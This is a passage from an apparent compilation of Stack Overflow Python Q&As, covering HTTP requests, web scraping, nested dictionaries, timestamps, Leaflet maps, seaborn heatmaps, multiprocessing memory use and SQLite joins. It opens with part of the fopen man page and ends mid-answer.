exist, otherwise it is truncated. The stream is positioned at
the beginning of the file.
``a'' Open for writing. The file is created if it does not exist. The
stream is positioned at the end of the file. Subsequent writes
to the file will always end up at the then current end of file,
irrespective of any intervening fseek(3) or similar.
``a+'' Open for reading and writing. The file is created if it does not
exist. The stream is positioned at the end of the file. Subse-
quent writes to the file will always end up at the then current
end of file, irrespective of any intervening fseek(3) or similar.
|
Problems using HTTPSConnection with http.client
Question: I'm new to Python and especially to web coding. I'm trying to make a program
that asks for a name and a surname, and then check on Pipl if there is any
result(s). My "tactic" is to directly go to the URL (containing the
information) with the result, without using POST method to complete the fields
of the website. I tried this:
import http.client
name = input("Name: ")
surname = input("Surname: ")
url = "pipl.com/search/?q=" + name + "+" + surname + "&l=&sloc=&in=5"
conn = http.client.HTTPSConnection(url, 443)
conn.putrequest('GET', '/')
conn.endheaders()
r = conn.getresponse()
print(r.read())
And I'm getting this error:
> socket.gaierror: [Errno -2] Name or service not known
I think that's because I don't only use the domain name (pipl.com), but
nothing helps me, I still stuck here.
I also told myself that using POST will be maybe easier. I repeat, I'm very
new to web coding (and I don't have the best English), I'm learning, so thanks
for your help !
Answer: The best way by all means is using the PIPL code libraries. Still, if you want
something that's more "quick and dirty", use the python 'requests' library
(<http://docs.python-requests.org/en/master/>) which can be installed with pip
and gives you what you need with ease. I took your initial code and came up
with this:
import requests
name = input("Name: ")
surname = input("Surname: ")
url = "http://api.pipl.com/search/?first_name=" + name + "&last_name=" + surname + "&key=sample_key"
response = requests.get(url)
print (response.json())
The end results is the json response from the API. Read more about the API
possible responses at <https://pipl.com/dev/reference/#response>
|
Accessings deeply nested dictionary/list elements/values in Python
Question: I've been racking my brain on this problem and the logic needed to step
through this output from Google Maps API.
Essentially I'm using google maps Distance_Matrix: Here is an example of the
returned information from a call of the API for distance/time between two
addresses, which I've assigned to variable _distanceMatrixReturn_ for this
example.
distanceMatrixReturn = {
{'destination_addresses': ['This would be ADDRESS 1'],
'status': 'OK',
'rows': [
{
'elements': [
{
'duration_in_traffic': {
'text': '10 mins', 'value': 619},
'status': 'OK',
'distance': {'text': '2.8 mi', 'value': 4563},
'duration': {'text': '9 mins', 'value': 540}}]}],
}]
}],
'origin_addresses': ['This would be ADDRESS 2']
}
Now, being a python newbie struggling with nested dictionaries and lists; Here
is my thought process:
I want to access the value `'2.8 mi'` that to my impression, is within a
dictionary tied to the key 'text', which is in turn inside a dictionary
assigned to the key `'distance'`, which is in another dictionary with the key
`'duration_in_traffic'`.
The key `'duration_in_traffic'` seems to be within a list, tied to the
dictionary key `'elements'`, which in turn is in a list tied to another
dictionary key, `'rows'`.
Now, this seems very very convoluted and there must be an easy way to handle
this situation, or maybe my logic is just off about the nested within nested
elements and the method of accessing them.
For example, among other posts here, I've read the following to try and figure
out the process of intepreting something seemingly similar. [How to access a
dictionary key value present inside a
list?](http://stackoverflow.com/questions/6521892/how-to-access-a-dictionary-
key-value-present-inside-a-list)
Please let me know if I structured the distanceMatrixReturn on this post
poorly. I spaced it to try and make it more readable, I hope I've achieved
that.
Answer: Your dictionary is broken, so it's hard to imagine the right path. Anyway.
from operator import getitem
path = ["rows", 0, "elements", 0, "duration_in_traffic", "distance", "text"]
reduce(getitem, path, distanceMatrixReturn) # -> "2.8 mi"
On Python 3 you will have to import `reduce` from `functools` first.
|
How to create a UNIX timestamp for every minute in Python
Question: I want to create a UNIX timestamp for the date `2014-10-31` for every minute
of the day. I have got a timestamp for the date but not for every minute -
import datetime
date = '2014-10-31'
t_stamp = int(time.mktime(datetime.datetime.strptime(date, "%Y-%m-%d").timetuple()))
print t_stamp
I want to save all these entries in a file which I need to access later to get
specific entries only.
If I need to access one of the timestamp records using a date and specific
time, how can it be done? For example, I need to find the entries for
`2014-31-10` for the time between `20:00` and `20:05`, how can it be done?
Any help would be appreciated!
Updated:
import datetime
import ipaddress
from random import randint
for x in ip_range.hosts():
for h in range(24): #24 hours
for i in range(60): # 60 minutes
f.write(str(t_stamp)+'\t'+str(x)+'\t0\t'+str(randint(0,100))+'%\n')
f.write(str(t_stamp)+'\t'+str(x)+'\t1\t'+str(randint(0,100))+'%\n')
t_stamp += 60 # one minute
Now I am looking to create a log file for every minute. How can that be done?
Answer:
t_stamp = int(time.mktime(datetime.datetime.strptime(date, "%Y-%m-%d").timetuple()))
for h in range(24): 24 hours
for i in range(60): # 60 minutes
print t_stamp
t_stamp += 60 # one minute
|
why is this formula for a circle giving me an ellipsoid in Javascript but a circle in Python?
Question: I adapted the following code for python found on this
[page](http://stackoverflow.com/a/15890673/2075859): for a Javascript
equivalent.
import math
# inputs
radius = 1000.0 # m - the following code is an approximation that stays reasonably accurate for distances < 100km
centerLat = 30.0 # latitude of circle center, decimal degrees
centerLon = -100.0 # Longitude of circle center, decimal degrees
# parameters
N = 10 # number of discrete sample points to be generated along the circle
# generate points
circlePoints = []
for k in xrange(N):
# compute
angle = math.pi*2*k/N
dx = radius*math.cos(angle)
dy = radius*math.sin(angle)
point = {}
point['lat']=centerLat + (180/math.pi)*(dy/6378137)
point['lon']=centerLon + (180/math.pi)*(dx/6378137)/math.cos(centerLat*math.pi/180)
# add to list
circlePoints.append(point)
print circlePoints
The distance between these points is constant, as it should be.
My JS version is, as far as I know, equivalent:
var nodesCount = 8;
var coords = [];
for (var i = 0; i <= nodesCount; i++) {
var radius = 1000;
var angle = Math.PI*2*i/nodesCount;
var dx = radius*Math.cos(angle);
var dy = radius*Math.sin(angle);
coords.push([(rootLongitude + (180 / Math.PI) * (dx / EARTH_RADIUS) / Math.cos(rootLatitude * Math.PI / 180)),(rootLatitude + (180 / Math.PI) * (dy / EARTH_RADIUS))]);
}
But when I output this, the coordinates are not equidistant from the center.
This is enormously frustrating -- I've been trying to debug this for a day.
Can anyone see what's making the JS code fail?
Answer: You somehow got lat/lon reversed.
var linkDistance = 10; //$('#linkDistance').val();
var nodesCount = 8;
var bandwidth = "10 GB/s";
var centerLat = 35.088878;
var centerLon = -106.65262;
var EARTH_RADIUS = 6378137;
var mymap = L.map('mapid').setView([centerLat, centerLon], 11);
L.tileLayer('https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}.png?access_token=pk.eyJ1IjoibWFwYm94IiwiYSI6ImNpandmbXliNDBjZWd2M2x6bDk3c2ZtOTkifQ._QA7i5Mpkd_m30IGElHziw', {
maxZoom: 18,
attribution: 'Map data © <a href="http://openstreetmap.org">OpenStreetMap</a> contributors, ' +
'<a href="http://creativecommons.org/licenses/by-sa/2.0/">CC-BY-SA</a>, ' +
'Imagery © <a href="http://mapbox.com">Mapbox</a>',
id: 'mapbox.streets'
}).addTo(mymap);
function drawNext(centerLat, centerLon) {
var coords = [];
for (var i = 0; i < nodesCount; i++) {
var radius = linkDistance * 1000;
var angle = Math.PI * 2 * i / nodesCount;
var dx = radius * Math.cos(angle);
var dy = radius * Math.sin(angle);
var lat = centerLon + (180 / Math.PI) * (dy / 6378137);
var lon = centerLat + (180 / Math.PI) * (dx / 6378137) / Math.cos(centerLon * Math.PI / 180);
coords.push([lat, lon]);
}
for (var i = 0; i < coords.length; i++) {
new L.Circle(coords[i], 500, {
color: 'black',
fillColor: '#f03',
fillOpacity: 0.1
}).addTo(mymap);
console.log("added circle to: " + coords[i]);
}
}
drawNext(centerLon, centerLat);
var popup = L.popup();
function onMapClick(e) {
popup
.setLatLng(e.latlng)
.setContent("You clicked the map at " + e.latlng.toString())
.openOn(mymap);
}
mymap.on('click', onMapClick);
#mapid {
height: 500px;
}
<script src="https://npmcdn.com/leaflet@1.0.0-rc.2/dist/leaflet-src.js"></script>
<link href="https://npmcdn.com/leaflet@1.0.0-rc.2/dist/leaflet.css" rel="stylesheet"/>
<div id="mapid"></div>
|
Get location from response header
Question: I am trying to get the `Location` value from a `POST` request using python's
requests module. However, when I look at the response's headers, I don't see
any such key. Performing the same request using Google Chrome does show the
key.
This is where I am trying to download data from: <https://data.police.uk/data>
. Launch this in Google Chrome and open the Developer Tools. When you select a
date range, select some force and click `Generate File`, you can see a `POST`
request being made with a `Location` key in the Response header.
import requests
from urlparse import urlparse, urljoin
BASE = 'https://data.police.uk'
FORM_PATH = 'data'
form_url = urljoin(BASE, FORM_PATH)
# Get data download URL
client = requests.session()
try:
client.get(form_url)
except requests.exceptions.ConnectionError as e:
print (e)
sys.exit()
csrftoken = client.cookies.values()
l = [('forces', 'cleveland')]
t = ('csrfmiddlewaretoken', csrftoken[0])
d_from = ('date_from', '2014-05')
d_to = ('date_to', '2016-05')
l.extend((t, d_from, d_to))
r = client.post(form_url, headers=dict(Referer=form_url), data=l)
Querying the response headers gives me:
In [4]: r.headers
Out[4]: {'Content-Length': '4332', 'Content-Language': 'en-gb', 'Content-Encoding': 'gzip', 'Set-Cookie': 'csrftoken=aGQ7kO4tQ2cPD0Fp2svxxYBRe4rAk0kw; expires=Thu, 03-Aug-2017 22:11:44 GMT; Max-Age=31449600; Path=/', 'Vary': 'Cookie, Accept-Language', 'Server': 'nginx', 'Connection': 'keep-alive', 'Date': 'Thu, 04 Aug 2016 22:11:44 GMT', 'Content-Type': 'text/html; charset=utf-8'}
Question: How do I get the `Location` key from the response header?
**EDIT**
Answer: Had to specify `l.append(['include_crime', 'on'])`. Works after this.
Answer: # EDIT2
You need to pass the `include_crime = on` statement as well, since you are not
selecting any dataset. On the webpage if you don't select any checkbox, you
will get the same page and you will not get any location header. That is why
your r.content has "Please select at least one dataset".
|
Python script for web scraping from web pages to find ip address for urls present in it
Question: I have started writing script as mentioned below
import urllib2
from bs4 import BeautifulSoup
trg_url='http://timesofindia.indiatimes.com/'
req=urllib2.Request(trg_url)
handle=urllib2.urlopen(req)
page_content=handle.read()
soup=BeautifulSoup(page_content,"html")
new_list=soup.find_all('a')
for link in new_list:
print link.get('href')
but now i am stuck, as i am getting below mentioned output
http://mytimes.indiatimes.com/?channel=toi
https://www.facebook.com/TimesofIndia
https://twitter.com/timesofindia
https://plus.google.com/117150671992820587865?prsrc=3
http://timesofindia.indiatimes.com/rss.cms
https://www.youtube.com/user/TimesOfIndiaChannel
javascript:void(0);
http://timesofindia.indiatimes.com
javascript://
http://beautypageants.indiatimes.com/
http://photogallery.indiatimes.com/
http://timesofindia.indiatimes.com/videos/entertainment/videolist/3812908.cms
javascript://
/life/fashion/articlelistls/2886715.cms
/life-style/relationship/specials/lsspeciallist/6247311.cms
/debatelist/3133631.cms
please guide me to extract the different URLs present in web page and there IP
address
Answer: Use the socket module to get the ip address:
import urllib2
from bs4 import BeautifulSoup
import socket
import csv
trg_url='http://timesofindia.indiatimes.com/'
req=urllib2.Request(trg_url)
handle=urllib2.urlopen(req)
page_content=handle.read()
soup=BeautifulSoup(page_content,"lxml")
new_list=soup.find_all('a')
final_list = []
for link in new_list:
l = link.get('href')
try:
final_list.append([l,socket.gethostbyname(l.split('/')[2])])
except:
final_list.append([l,[]])
with open('output.csv','wb') as f:
wr = csv.writer(f)
for row in final_list:
wr.writerow(row)
|
I typed python -v in my terminal and something weird happened
Question: Thinking I was about to check the version of Python installed on my computer,
I typed
python -v
in my terminal and I got a first line saying
> "installing zipimport hook", but then also a whole bunch of text (probably
> 50 or so lines of text), among which "import errno # builtin", "import posix
> # builtin", "import _codecs # builtin", and toward the end "Python 2.7.8
> |Anaconda 2.1.0 (x86_64)| (default, Aug 21 2014, 15:21:46)"
What did I do? And what did that command install?
**EDIT** : the `v` I typed in `python -v` was a lowercase `v`. When I now try
an uppercase `V`, I do get the version of Python on my computer.
Answer: You want `python -V` (uppercase) or `python --version`. The lowercase `-v`
means “verbose” and adds a bunch of diagnostic information to the output that
you can safely ignore.
|
How to retrieve a total pixel value above an average-based threshold in Python
Question: Currently, I am practicing with retrieving the total of the pixel values above
a threshold based on the mean of the whole image. (I am very new to Python). I
am using Python 3.5.2, and the above code was copied from the Atom program I
am using to write and experiment with the code.
For the time being, I am just practicing with the red channel - but
eventually, I will need to individually analyse all colour channels.
The complete code that I am using so far:
import os
from skimage import io
from tkinter import *
from tkinter.filedialog import askopenfilename
def callback():
M = askopenfilename() #to select a file
image = io.imread(M) #to read the selected file
red = image[:,:,0] #selecting the red channel
red_av = red.mean() #average pixel value of the red channel
threshold = red_av + 100 #setting the threshold value
red_val = red > threshold
red_sum = sum(red_val)
print(red_sum)
Button(text = 'Select Image', command = callback).pack(fill = X)
mainloop()
Now, everything works so far, except when I run the program, red_sum comes out
to be the number of pixels above the threshold, not the total of the pixels.
What I am I missing? I am thinking that my (possible naive) way of declaring
the `red_val` variable has something to do with it.
But, how do I retrieve the total pixel value above the threshold?
Answer: When you did (red > threshold) you got a mask such that all the pixels in red
that are above the thrshold got the value 1 and 0 other wise. Now to get the
values you can just multiply the mask with the red channel. The multiplcation
will zero all the values that are less than the threshold and will leave the
values over the threshold unchanged.
The code:
red_val = (red > threshold)*red
red_sum = sum(red_val)
|
generate a heatmap from a dataframe with python and seaborn
Question: I'm new to Python and fairly new to seaborn.
I have a pandas dataframe named df which looks like:
TIMESTAMP ACT_TIME_AERATEUR_1_F1 ACT_TIME_AERATEUR_1_F2 ACT_TIME_AERATEUR_1_F3 ACT_TIME_AERATEUR_1_F4 ACT_TIME_AERATEUR_1_F5 ACT_TIME_AERATEUR_1_F6
2015-08-01 23:00:00 80 0 0 0 10 0
2015-08-01 23:20:00 60 0 20 0 10 10
2015-08-01 23:40:00 80 10 0 0 10 10
2015-08-01 00:00:00 60 10 20 40 10 10
df.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 38840 entries, 0 to 38839
Data columns (total 7 columns):
TIMESTAMP 38840 non-null datetime64[ns]
ACT_TIME_AERATEUR_1_F1 38696 non-null float64
ACT_TIME_AERATEUR_1_F3 38697 non-null float64
ACT_TIME_AERATEUR_1_F5 38695 non-null float64
ACT_TIME_AERATEUR_1_F6 38695 non-null float64
ACT_TIME_AERATEUR_1_F7 38693 non-null float64
ACT_TIME_AERATEUR_1_F8 38696 non-null float64
dtypes: datetime64[ns](1), float64(6)
memory usage: 2.1 MB
I try to do a heatmap using this code :
data = sns.load_dataset("df")
# Draw a heatmap with the numeric values in each cell
sns.heatmap(data, annot=True, fmt="d", linewidths=.5)
But it does not work Can you help me pelase to find the error?
Thanks
**Edit** First , I load dataframe from csv file :
df1 = pd.read_csv('C:/Users/Demonstrator/Downloads/Listeequipement.csv',delimiter=';', parse_dates=[0], infer_datetime_format = True)
Then, I select only rows which date '2015-08-01 23:10:00' and '2015-08-02
00:00:00'
import seaborn as sns
df1['TIMESTAMP']= pd.to_datetime(df1_no_missing['TIMESTAMP'], '%d-%m-%y %H:%M:%S')
df1['date'] = df_no_missing['TIMESTAMP'].dt.date
df1['time'] = df_no_missing['TIMESTAMP'].dt.time
date_debut = pd.to_datetime('2015-08-01 23:10:00')
date_fin = pd.to_datetime('2015-08-02 00:00:00')
df1 = df1[(df1['TIMESTAMP'] >= date_debut) & (df1['TIMESTAMP'] < date_fin)]
Then, construct the heatmap :
sns.heatmap(df1.iloc[:,2:],annot=True, fmt="d", linewidths=.5)
I get this error :
>
> TypeError Traceback (most recent call
> last)
> <ipython-input-363-a054889ebec3> in <module>()
> 7 df1 = df1[(df1['TIMESTAMP'] >= date_debut) & (df1['TIMESTAMP'] <
> date_fin)]
> 8
> ----> 9 sns.heatmap(df1.iloc[:,2:],annot=True, fmt="d", linewidths=.5)
>
> C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in
>
>
> heatmap(data, vmin, vmax, cmap, center, robust, annot, fmt, annot_kws,
> linewidths, linecolor, cbar, cbar_kws, cbar_ax, square, ax, xticklabels,
> yticklabels, mask, **kwargs) 483 plotter = _HeatMapper(data, vmin, vmax,
> cmap, center, robust, annot, fmt, 484 annot_kws, cbar, cbar_kws,
> xticklabels, \--> 485 yticklabels, mask) 486 487 # Add the pcolormesh kwargs
> here
>
>
> C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in
>
>
> **init**(self, data, vmin, vmax, cmap, center, robust, annot, fmt,
> annot_kws, cbar, cbar_kws, xticklabels, yticklabels, mask) 165 # Determine
> good default values for the colormapping 166
> self._determine_cmap_params(plot_data, vmin, vmax, \--> 167 cmap, center,
> robust) 168 169 # Sort out the annotations
>
>
> C:\Users\Demonstrator\Anaconda3\lib\site-packages\seaborn\matrix.py in
>
>
> _determine_cmap_params(self, plot_data, vmin, vmax, cmap, center, robust)
> 202 cmap, center, robust): 203 """Use some heuristics to set good defaults
> for colorbar and range.""" \--> 204 calc_data =
> plot_data.data[~np.isnan(plot_data.data)] 205 if vmin is None: 206 vmin =
> np.percentile(calc_data, 2) if robust else calc_data.min()
>
>
> TypeError: ufunc 'isnan' not supported for the input types, and the
> inputs could not be safely coerced to any supported types
>
>
> according to the casting rule ''safe''
Answer: Remove the timestamp variables(i.e. first two columns) before passing it to
sns.heatmap, no need for the load dataset as well, just use:
sns.heatmap(df.iloc[:,2:],annot=True, fmt="d", linewidths=.5)
# EDIT
Ok here is your dataframe, just changed the column names in the interest of
time
df
Out[9]:
v1 v2 v3 v4 v5 v6 v7 v8
0 2015-08-01 23:00:00 80 0 0 0 10 0
1 2015-08-01 23:20:00 60 0 20 0 10 10
2 2015-08-01 23:40:00 80 10 0 0 10 10
3 2015-08-01 00:00:00 60 10 20 40 10 10
Now seaborn cannot recognize timestamp variables for the heatmap right, so we
will remove the first two columns and pass the dataframe to seaborn
import seaborn as sns
sns.heatmap(df.iloc[:,2:],annot=True, fmt="d", linewidths=.5)
So we get the result as
[![Output from
seaborn](http://i.stack.imgur.com/9BzZK.png)](http://i.stack.imgur.com/9BzZK.png)
If you don't get the result by using this, please edit your question to
include rest of your code. This is not the problem then.
|
How can I count a word from all lines that are 2 rows after a specific line?
Question: So, this might sound a bit confusing, I'll try to explain it. For example from
these lines:
next line 1
^^^^^^^^^^^^^^^^^^
red blue dark ten lemon
next line 2
^^^^^^^^^^^^^^^^^^^
hat 45 no dad fate orange
next line 3
^^^^^^^^^^^^^^^^^^^
tan rat lovely lemon eat
you him lemon Daniel her"
I am only interested in the count of "lemon" from lines that have "next line"
two lines above it. So, the output I expect is "2 lemons".
Any help will be greatly appreciated!
My attempt so far is:
#!/usr/bin/env python
#import the numpy library
import numpy as np
lemon = 0
logfile = open('file','r')
for line in logfile:
words = line.split()
words = np.array(words)
if np.any(words == 'next line'):
if np.any(words == 'lemon'):
lemon +=1
print "Total number of lemons is %d" % (lemon)
but this counts "lemon" only if it's on the same line as "next line".
Answer: For each line you need to be able to access to two line before it. For that
aim you can use `itertools.tee` in order to create two independent file object
(which are iterator-like objects) then use `itertools.izip()` in order to
create your your expected pairs:
from itertools import tee, izip
with open('file') as logfile:
spam, logfile = tee(logfile)
# consume first two line of spam
next(spam)
next(spam)
for pre, line in izip(logfile, spam):
if 'next line' in pre:
print line.count('lemon')
Or if you just want to count the lines you can use a generator expression
within `sum()`:
from itertools import tee, izip
with open('file') as logfile:
spam, logfile = tee(logfile)
# consume first two lines of spam
next(spam)
next(spam)
print sum(line.count('lemon') for pre, line in izip(logfile, spam) if 'next line' in pre)
|
Proper Use Of Python 3.x AMFY Module
Question: How am I supposed to use the Amfy module? I try to use it like the JSON module
(`amfy.loads` or `amfy.load`), but it just gives me errors:
C:\Users\Other>"C:\Users\Other\Desktop\Python3.5.2\test amf.py"
Traceback (most recent call last):
File "C:\Users\Other\Desktop\Python3.5.2\test amf.py", line 4, in <module>
print(amfy.load(cn_rsp.text))
File "C:\Users\Other\Desktop\Python3.5.2\lib\site-packages\amfy\__init__.py", line 9, in load
return Loader().load(input, proto=proto)
File "C:\Users\Other\Desktop\Python3.5.2\lib\site-packages\amfy\core.py", line 33, in load
return self._read_item3(stream, context)
File "C:\Users\Other\Desktop\Python3.5.2\lib\site-packages\amfy\core.py", line 52, in _read_item3
marker = stream.read(1)[0]
AttributeError: 'str' object has no attribute 'read'
this is what I wrote:
import requests
import amfy
cn_rsp = requests.get("http://realm498.c10.castle.rykaiju.com/api/locales/en/get_serialized_new")
print(amfy.load(cn_rsp.text))
Answer: The `load` method expects an input stream, you provide it a string. Just
convert your string into a memory buffer which supports `read` method like
this:
import io
print(amfy.load(io.BytesIO(cn_rsp.text.encode())))
unfortunately serialization fails when using this. Is there another url where
it would work, a test URL maybe?
File "C:\Python34\lib\site-packages\amfy\core.py", line 146, in _read_vli
byte = stream.read(1)[0]
IndexError: index out of range
|
python multiprocessing.Array: huge temporary memory overhead
Question: If I use python's multiprocessing.Array to create a 1G shared array, I find
that the python process uses around 30G of memory during the call to
multiprocessing.Array and then decreases memory usage after that. I'd
appreciate any help to figure out why this is happening and to work around it.
Here is code to reproduce it on Linux, with memory monitored by smem:
import multiprocessing
import ctypes
import numpy
import time
import subprocess
import sys
def get_smem(secs,by):
for t in range(secs):
print subprocess.check_output("smem")
sys.stdout.flush()
time.sleep(by)
def allocate_shared_array(n):
data=multiprocessing.Array(ctypes.c_ubyte,range(n))
print "finished allocating"
sys.stdout.flush()
n=10**9
secs=30
by=5
p1=multiprocessing.Process(target=get_smem,args=(secs,by))
p2=multiprocessing.Process(target=allocate_shared_array,args=(n,))
p1.start()
p2.start()
print "pid of allocation process is",p2.pid
p1.join()
p2.join()
p1.terminate()
p2.terminate()
Here is output:
pid of allocation process is 2285
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 773 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2528 2700
2284 ubuntu python test.py 0 1080 4566 11924
2286 ubuntu /usr/bin/python /usr/bin/sm 0 4688 5573 7152
2276 ubuntu python test.py 0 4000 8163 16304
2285 ubuntu python test.py 0 137948 141431 148700
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 773 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2528 2700
2284 ubuntu python test.py 0 1188 4682 12052
2287 ubuntu /usr/bin/python /usr/bin/sm 0 4696 5560 7160
2276 ubuntu python test.py 0 4016 8174 16304
2285 ubuntu python test.py 0 13260064 13263536 13270752
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 773 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2528 2700
2284 ubuntu python test.py 0 1188 4682 12052
2288 ubuntu /usr/bin/python /usr/bin/sm 0 4692 5556 7156
2276 ubuntu python test.py 0 4016 8174 16304
2285 ubuntu python test.py 0 21692488 21695960 21703176
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 773 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2528 2700
2284 ubuntu python test.py 0 1188 4682 12052
2289 ubuntu /usr/bin/python /usr/bin/sm 0 4696 5560 7160
2276 ubuntu python test.py 0 4016 8174 16304
2285 ubuntu python test.py 0 30115144 30118616 30125832
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 771 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2527 2700
2284 ubuntu python test.py 0 1192 4808 12052
2290 ubuntu /usr/bin/python /usr/bin/sm 0 4700 5481 7164
2276 ubuntu python test.py 0 4092 8267 16304
2285 ubuntu python test.py 0 31823696 31827043 31834136
PID User Command Swap USS PSS RSS
2116 ubuntu top 0 700 771 1044
1442 ubuntu -bash 0 2020 2020 2024
1751 ubuntu -bash 0 2492 2527 2700
2284 ubuntu python test.py 0 1192 4808 12052
2291 ubuntu /usr/bin/python /usr/bin/sm 0 4700 5481 7164
2276 ubuntu python test.py 0 4092 8267 16304
2285 ubuntu python test.py 0 31823696 31827043 31834136
Process Process-2:
Traceback (most recent call last):
File "/usr/lib/python2.7/multiprocessing/process.py", line 258, in _bootstrap
self.run()
File "/usr/lib/python2.7/multiprocessing/process.py", line 114, in run
self._target(*self._args, **self._kwargs)
File "test.py", line 17, in allocate_shared_array
data=multiprocessing.Array(ctypes.c_ubyte,range(n))
File "/usr/lib/python2.7/multiprocessing/__init__.py", line 260, in Array
return Array(typecode_or_type, size_or_initializer, **kwds)
File "/usr/lib/python2.7/multiprocessing/sharedctypes.py", line 115, in Array
obj = RawArray(typecode_or_type, size_or_initializer)
File "/usr/lib/python2.7/multiprocessing/sharedctypes.py", line 88, in RawArray
result = _new_value(type_)
File "/usr/lib/python2.7/multiprocessing/sharedctypes.py", line 63, in _new_value
wrapper = heap.BufferWrapper(size)
File "/usr/lib/python2.7/multiprocessing/heap.py", line 243, in __init__
block = BufferWrapper._heap.malloc(size)
File "/usr/lib/python2.7/multiprocessing/heap.py", line 223, in malloc
(arena, start, stop) = self._malloc(size)
File "/usr/lib/python2.7/multiprocessing/heap.py", line 120, in _malloc
arena = Arena(length)
File "/usr/lib/python2.7/multiprocessing/heap.py", line 82, in __init__
self.buffer = mmap.mmap(-1, size)
error: [Errno 12] Cannot allocate memory
Answer: From the format of your print statements, you are using python 2
Replace `range(n)` by `xrange(n)` to save some memory.
data=multiprocessing.Array(ctypes.c_ubyte,xrange(n))
(or use python 3)
1 billion range takes roughly 8GB (well I just tried that on my windows PC and
it froze: just don't do that!)
Tried with 10**7 instead just to be sure:
>>> z=range(int(10**7))
>>> sys.getsizeof(z)
80000064 => 80 Megs! you do the math for 10**9
A generator function like `xrange` takes no memory since it provides the
values one by one when iterated upon.
In Python 3, they must have been fed up by those problems, figured out that
most people used `range` because they wanted generators, killed `xrange` and
turned `range` into a generator. Now if you really want to allocate all the
numbers you have to to `list(range(n))`. At least you don't allocate one
terabyte by mistake!
Edit:
The OP comment means that my explanation does not solve the problem. I have
made some simple tests on my windows box:
import multiprocessing,sys,ctypes
n=10**7
a=multiprocessing.RawArray(ctypes.c_ubyte,range(n)) # or xrange
z=input("hello")
Ramps up to 500Mb then stays at 250Mb with python 2 Ramps up to 500Mb then
stays at 7Mb with python 3 (which is strange since it should at least be
10Mb...)
Conclusion: ok, it peaks at 500Mb, so that's not sure it will help, but can
you try your program on Python 3 and see if you have less overall memory
peaks?
|
parallel program in python using Threads
Question: Generating the sum from adding integer numbers successively up to n where n =
2000 given by the following formula: n(n+1)/2 so far i have don it in serial.I
need help on how to make it compute in parallel such that it adaptively make
use of all the available processors/cores on the host computer.
#!/usr/bin/env python3
from datetime import datetime
n=1
v=0
start_time = datetime.now()
while n<=10:
(n*(n+1)/2)
b=(n*(n+1)/2)
n = n+1
end_time =datetime.now()
print (b)
print('Time taken : {}'. format(end_time-start_time))
Answer: To do this, you need to use `multiprocessing`, which lets you create processes
and assign procedures to them. Here's a code snippet that does part of what
you want:
#!/usr/bin/env python3
from datetime import datetime
MAX_NUM = 10000000
NUMPROCS = 1
# LINEAR VERSION
start_time = datetime.now()
my_sum = 0
counter = 1
while counter <= MAX_NUM:
my_sum += counter
counter += 1
end_time =datetime.now()
print (my_sum)
print('Time taken : {}'. format(end_time-start_time))
# THREADING VERSION
from multiprocessing import Process, Queue
start_time = datetime.now()
def sum_range(start,stop,out_q):
i = start
counter = 0
while i < stop:
counter += i
i += 1
out_q.put(counter)
mysums = Queue()
mybounds = [1+i for i in range(0,MAX_NUM+1,int(MAX_NUM/NUMPROCS))]
myprocs = []
for i in range(NUMPROCS):
p = Process(target=sum_range, args=(mybounds[i],mybounds[i+1],mysums))
p.start()
myprocs.append(p)
mytotal = 0
for i in range(NUMPROCS):
mytotal += mysums.get()
for i in range(NUMPROCS):
myprocs[i].join()
print(mytotal)
end_time =datetime.now()
print('Time taken : {}'. format(end_time-start_time))
Although the code doesn't adaptively use processors, it does divide the task
into a prespecified number of processes.
|
Find parent with certain combination of child rows - SQLite with Python
Question: There are several parts to this question. I am working with sqlite3 in Python
2.7, but I am less concerned with the exact syntax, and more with the methods
I need to use. I think the best way to ask this question is to describe my
current database design, and what I am trying to accomplish. I am new to
databases in general, so I apologize if I don't always use correct
nomenclature.
I am modeling refrigeration systems (using Modelica--not really important to
know), and I am using the database to manage input data, results data, and
models used for that data.
My top parent table is `Model`, which contains the columns:
id, name, version, date_created
My child table under `Model` is called `Design`. It is used to create a unique
id for each combination of design input parameters and the model used. the
columns it contains are:
id, model_id, date_created
I then have two child tables under `Design`, one called `Input`, and the other
called `Result`. We can just look at Input for now, since one example should
be enough. The columns for input are:
id, value, design_id, parameter_id, component_id
`parameter_id` and `component_id` are foreign keys to their own tables.The
`Parameter` table has the following columns:
id, name, units
Some example rows for `Parameter under` name are: length, width, speed,
temperature, pressure (there are many dozens more). The Component table has
the following columns:
id, name
Some example rows for `Component` under name are: compressor, heat_exchanger,
valve.
Ultimately, in my program I want to search the database for a specific design.
I want to be able to search a specific design to be able to grab specific
results for that design, or to know whether or not a model simulation with
that design has already been run previously, to avoid re-running the same data
point.
I also want to be able to grab all the parameters for a given design, and
insert it into a class I have created in Python, which is then used to provide
inputs to my models. In case it helps for solving the problem, the classes I
have created are based on the components. So, for example, I have a compressor
class, with attributes like compressor.speed, compressor.stroke,
compressor.piston_size. Each of these attributes should have their own row in
the Parameter table.
So, how would I query this database efficiently to find if there is a design
that matches a long list (let's assume 100+) of parameters with specific
values? Just as a side note, my friend helped me design this database. He
knows databases, but not my application super well. It is possible that I
designed it poorly for what I want to accomplish.
Here is a simple picture trying to map a certain combination of parameters
with certain values to a design_id, where I have taken out component_id for
simplicity:
[Picture of simplified tables](http://i.stack.imgur.com/M33DW.png)
Answer: Simply join the necessary tables. Your schema properly reflects normalization
(separating tables into logical groupings) and can scale for one-to-many
relationships. Specifically, to answer your question --_So, how would I query
this database efficiently to find if there is a design that matches a long
list (let's assume 100+) of parameters with specific values?_ \-- consider
below approaches:
**Inner Join with Where Clause**
For handful of parameters, use an inner join with a `WHERE...IN()` clause.
Below returns _design_ fields joined by _input_ and _parameters_ tables,
filtered for specific parameter names where you can have Python pass as
parameterized values even iteratively in a loop:
